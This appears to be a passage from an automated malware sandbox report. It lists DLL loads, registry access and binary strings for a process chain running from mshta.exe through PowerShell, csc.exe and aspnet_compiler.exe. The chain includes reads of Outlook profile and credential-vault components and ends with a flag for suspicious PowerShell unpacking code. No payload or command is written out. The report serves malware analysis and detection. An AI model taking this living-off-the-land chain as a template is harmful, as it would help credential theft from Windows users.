Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1715998634.0000000007651000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbJ source: powershell.exe, 00000003.00000002.1716282823.000000000767A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: 31437F.exe.13.dr
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.pdb source: powershell.exe, 00000001.00000002.1822805726.00000000059C6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

